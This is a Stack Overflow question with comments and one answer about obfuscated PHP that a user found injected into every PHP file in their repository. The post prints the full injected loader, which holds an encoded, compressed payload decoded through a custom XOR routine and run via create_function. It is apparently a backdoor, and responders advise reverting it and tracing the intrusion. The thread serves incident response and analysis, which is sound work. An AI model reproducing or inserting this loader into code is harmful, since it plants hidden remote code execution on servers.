4

I have this code on top of all my php files in the source control somehow

Can you someone please shed some light on what this is?

EDIT: I know its most likely bad, I know that it is trying to create functions. But what exactly are those functions going to do? It is too jumbled!! If some one can spend some time on this, then hats off to them.

Otherwise, I am attempting this tomorrow with a fresh mind.

Thanks fellow stackoverflowERS for all the help :)

<?php
     $qhtgndmn;
    $qhtgndmn = array(
        '$qhtgndmn[0]=array_pop($qhtgndmn);$twpxkaml=twpxkaml(1,13);$qhtgndmn[0]=$twpxkaml($qhtgndmn[2]);',
        '$qhtgndmn[2]=gzuncompress(twpxkaml(696,2300));',
        'cH5/V3l1ZWl1eHx6Z31PZHVhUmRpcWxreVl9eWV4ZnFoWGh/cGlzel1ZRUlGXF5QUktLSkRWQF5QRGVwcH11Ym14fXhpbHltdEF3Q3lEUURCWFlJd1NLWG12dnBac2R6SlVEXk9CTldCX1Zwe3FkaWFldSh6fm03MTk8L1ptTC0+JSY8WURuQnhuPyhhVUFVMGx1REtMayJScWhIUExDRTVHIkVBQm55cWRieGNHfn95b2Z1On5sZW1pKmtkc31lPWpjfnZlYnkpa3JnZ3VtO29pZHR0f2h3VmVYakN6dnYjPzlVUUduUURCWFVYXlRZSmV7cWVtPCROY2hubWJkInB0cH94I3l1fWJueWxuY0NDcDJrYXh5S1VHXU9DRVhYX0tnalpTQldKU0RBWkROSUxAR253UUhFU1pTT0JTX0RMQVBwViZRd1FEQlhVRUJCX1JDQURHUVVLRzZ0c34lY3lqUG1ZNmdmJWl/f3NoY3YpYmhmcnxvTXNsYHpna3ROc2B9XWJoe3FhYU1dRmRNVVtYUmphaE1dRkxDQkRZeDZke3glPndoY3kvc29gfVZNNmR7eCU+WERIIHdoaHFTNmR7eFZHdTZnZiVpf39zaGN2KXR5aXV4dGVUZnpEWEt/f2Rrb3ROY2R/Z1U3TFg3fHlvQ2thbm1lVk94ZkZ2THwhOGlkcX1+eWRhZy9md31sTWltaThgY350c3cjbGN1Q3F6Z3siOG5lf3NmfyNsY3U2Z2YlaX9/YWRqLHZpeTpvJEJsYz97K2JpU0I/ZCt4YmA3dzBOZD9mK0JDaFR6ZWRkVXBrUG0oYVdxZGJ4MD8+SFR2ZUo/ZytubXNycnB+f3xXUkh0V2RqdWJnemRRP2cra39ZeWdNfGhza0M/Zyt7YTBZU1ldLTcvOWlmUX9lfDAwaWw2cVZDYYyTEGN/ykH7oo4DNClEXPk9vz6xJkNyFmFoAY9aZftjFYgaJ07zJkdH8dn67yUjjfR69CvErfxz' . 'PlOOhSI6Erok5o1bA6nMJSDxxqq7Zz6Tz0YM+qBfuifH0GOxhs+wDbow12WMNREZRJOhI0++l8t4Tw5fHyIiTltPV1fM7hFJ3YY8UyVVXgz9dUIU4cSgOEmkMqnEBofXWVQzC2SQWdK2X/7j9mEPkL0WwFQXY2sKlpefbbtyupzcOtn64iETbtX9Qk7Pwd967v8wtNauzZFXoZ3kp/wTiH4SRs0xhWW3e1FBFHdv1//KCGIEG8OhKz/l3Nxc+l2fFeUdd3PIiobJ74PHLiHY93h9Dl7SFoFOFD1Os3+NcrhX22NUzURgdwvm8YtAHxwpXnsWs4jMGYdYLF0SWTks8X7DKwPzDCsET1IZ9XAr8+uQMuo9xfz+i64uMaIbefcL8+uahwpD+y69nfBST5p6vTY9+9Xi/RlejL9xwyp1mKyQ2cEiBCimYZzHIf0+5iE7Ytc1+ihMNfFv3lMdvffIz6Rq76MNy4gOQpJNWsVU3UcunOlr4r1hlCd35t+7KxDLiLFJD4SJxJSjOkEWl0UU8Am/rSkAd' . 'dMpbneYjz2YP+nXJu1ckKjtYP4VX8Vd7OQLb8cObiiTTw93W1gCp/LimsjhmYrOYpzvYtQicT2nsr5091XeGnWm+m2oxbsqUi5QGjMSSJbMvME7PFQPWU8aCUsopHbmPyxOJs7dPzBCNQBUhUr+8mrOcsbX3aMkjMynJ0ASbG0d4EnF6943KEQWqZMFe8tU/m+HcJuDssyWHmVxGWA4x2QQi1fYAD2act1p09RQf4irmqJinYdfG4y/AX0WaEImy9C5FeB8Mj5UGv18pAZ9O3O50cvTfmWRs0yroVieP6ZPPW0pDpCtOvE+jfTzyFhwOHazWYAu4ag+iHpWrU+OFZhUJX520KzaJnLAzA5N0wmDvdgoYtpnQ2eam7hil1t0F3KohSXhk91FTghMnhQdWbY+bC6V6EfO2QzAmTbDk+4nqyTmweMaYaDQ+bSmzZtMHmX5aH1MP0x/hQ6Jcf/uzJaShQKLP+N/PIId4atvXc9dyAW7OjubhFTkCuYwwLiI3CSGoWrJGXFIA3ThehZygyutB4TJqii14hrRJF5DJBfO/TB8lh9+k/W3RafZO5e' . 'O3602dC3+gik0rzVJwF0tvByeQdNlc8pi0zx6q0uAD2dFiVJls2FZebcUA9mABrO30vdbMfyabEldMkX+po+PkL63xJiahC4thVL1e4nWFcFxV9x7Ghfko/lu90HQKx20M6lw6H7zB2e+lso7K/NHiHefufUP7ACFPggcfLY/PKjdR4mrf0uMlGfF3NkU1wxbEDp7S8TBADcyvW1sTZenmKjRuynMZWsgzpaL1GbdxbxqCcZ8j0c07+9+9P1nxHvJgc8ivprlNJVvafZckzzR55LRxi5oUiaHczCE/tj3cDq+OfybEHUd+nqBkEibSrnxnsgNQnICSqIiqfWQU9Pnm2PW6cqe6R3SvK+fO9WnuVYr2L62smMwZDENU9H9zyS1odWMnmQI2LYiT46UblsDR8QGxakmpDGM8kSeob1ac0razk2DerXttvrtkQW7DlUcbSAfgNhxjMD2c8VjTndaD2CTLuTE0Q/bza7bj4pexmWS4cdEBm0jInUKQzvYuuu9WV14NebJmYGGomjoploNyVNTLEVcRGA6n51v2kKmfvT9ouHg4vjyT+H86rbFPfntj3yJBa4w+FNFEwimiXDzu0aGl+QFR0nwARSe1duCyC33NUkzMf0rbdtiXkmX5cfIhTW0pbrR7jutZABUcK8JONEOKUSKuMCwzxv/6JoX5z11J0a+btMArNMbz+UAMxhmxv/5FPW+RPM52gHCrXkpn/uXTuvUYWCr3Ks+fg9VggsdQuJGVWm2oM3lVeHAG5dCyqJtjl+OY8FwuP7PJNgCH+w2jS3dxXxGbX919c3BxDpGZ9imENYwU7K4h7LQ1zTytBETjPI3haqXM3cC3XJ4iOpmhB/mqTMBtAhNfNSuJyRqyA97ITUsCy3ZMzJ+f+schIIrwN/9mIowJNokAc1Z84Rdd5UCkeYeZeubY7Ar7d86uVCF8qvhptLc4KvF53MMazOLcfYczkf5F2oQSqaVOx/H' . '5Rv6TWovgn7QIn0Shle5p6H+uaNOEi9oHmR6ClizijBY+TyDkVSuL/CQM99uXwytsY5QV788xxL08zWRjeCRQCrmYH2f8t2+oPw2pc9qtpIqhgUvuWsUw6APob+QwEsyUuiHhnJPYSs3vvgUZbAJvIRESJ/uvRqQVOcH2jg+VlWE9JfJcaeKevHOB/eBLM/GJ3rGFU/3H6qkac4SfQ+HxEu8C+22F/gWC8tsuzul/NdMlSeuxdhlmj1JrFjms6HUv2g5bqPd5AFVhFde6u5nTXLMnAypnv/UoSv5y57w5IPqH6jlcEWLEOZzITGg2sdCLdWgyZTe7L6pnRcKDOdl6SCNsCq35lEzPNgQQFccoeY6hbhB7NyFoHWkZqzgJu+6UN/HXAaI0SGB9ENyTha63Hfxe5rKdmfzoz0PS5uSleltbId57Q+eZgNQh9SRfiHt7ID7+nliqZJNuM1jfbq9f0ES2U704OT23s7loST10r2TudVGhk/wIdBHxSrqMMo6hLw/teHuifLihrlZFobhS/fXnoeBt76I+kKNcfZWexkb5ekadmipuIr44u/iFo6dtl+2J8SUIdzKml5nSR99mBWfo7OlwhK/nS8NnmKoG37mgoPyGlRSjyIXV1/EbRKH+L2Jtk6A/1Jr04RwMeM+o9yFzc+dfYJhONPKcIa9TX/Ndn/zlCFp/7Xy+O8S5zljlOOydS4J0CIBcGFX+DfnfTdMpFwXP5VrFXwyc0fThx+5f1qz5RSWuxQry/CBEgnB1utKv2qc+g2T7hoC2uaSlRbnAXzwShfC9rYXUsvGpQH8V+6/OIok6YJabTr9feok9s43ifz15urUgIQxlBmPiwoYvSUDWe453LIFe+7nd/L0e5rCWr/uBqIDgnVZZVFre3FlbTwkTmNobm1iZGxY',
        "f\x7bqem\x3c\x24Nchnmbd"
    );
    $hvnlvgr  = 'create_';
    if (function_exists($hvnlvgr .= 'function') && !function_exists('twpxkaml')) {
        function twpxkaml($d, $j)
        {
            global $qhtgndmn;
            $v = str_pad($g = 'yPvhJ0qgMmbfaIEZ', $j, $g);
            $e = str_repeat("\x1f", $j);
            $f = str_repeat("\xe0", $j);
            $n = substr($qhtgndmn[0], $d, $j);
            return (($n ^ $v) & $e) | ($n & $f);
        }
        ;
        for ($xv = -1; ++$xv < 3; $hvnlvgr('', '}' . $qhtgndmn[$xv] . '{'));
    }
    ;
    unset($qhtgndmn);

    var_
     ?>
Braiam
  • 1
  • 11
  • 47
  • 78
Vish
  • 4,508
  • 10
  • 42
  • 74
  • 6
    Looks obfuscated and could very well be malicious. Since it's in source control, use your source control's blame feature to identify the committer, then go ask that person about this code. If they don't know it, suspect at least one system is compromised. – Asaph Jan 18 '16 at 04:14
  • also, forty lashings to the sadist who chose those variable names. – ingernet Jan 18 '16 at 04:27
  • Can someone help me un-obfuscate it? – Vish Jan 18 '16 at 04:32
  • Revert it, change all your passwords (strong passwords!), and don't allow anyone to make any changes until you find out how they managed to get access to your server/repo. Also, make sure to update all the software you are using to the newest versions. – Sverri M. Olsen Jan 18 '16 at 04:33
  • I have already snapshotted the file system at this point to keep of copy of this code to try to find the root cause and reverted to the previous hourly one we take and set it to read only. @SverriM.Olsen – Vish Jan 18 '16 at 04:35
  • It's obviously malicious code, probably a backdoor of some sort. Trying to reverse engineer it is not going to be hugely enlightening; in particular, it won't tell you anything useful about how the exploit occurred. –  Jan 18 '16 at 09:37

1 Answers1

3

Looks like it's creating three anonymous functions with create_function, to execute obfuscated code it's hiding in the $qhtgndmn array and either decoding or obfuscating further with twpxkaml.

So assume it's malicious. Or by someone really, really bored. Check the commit log.

Tom
  • 939
  • 5
  • 9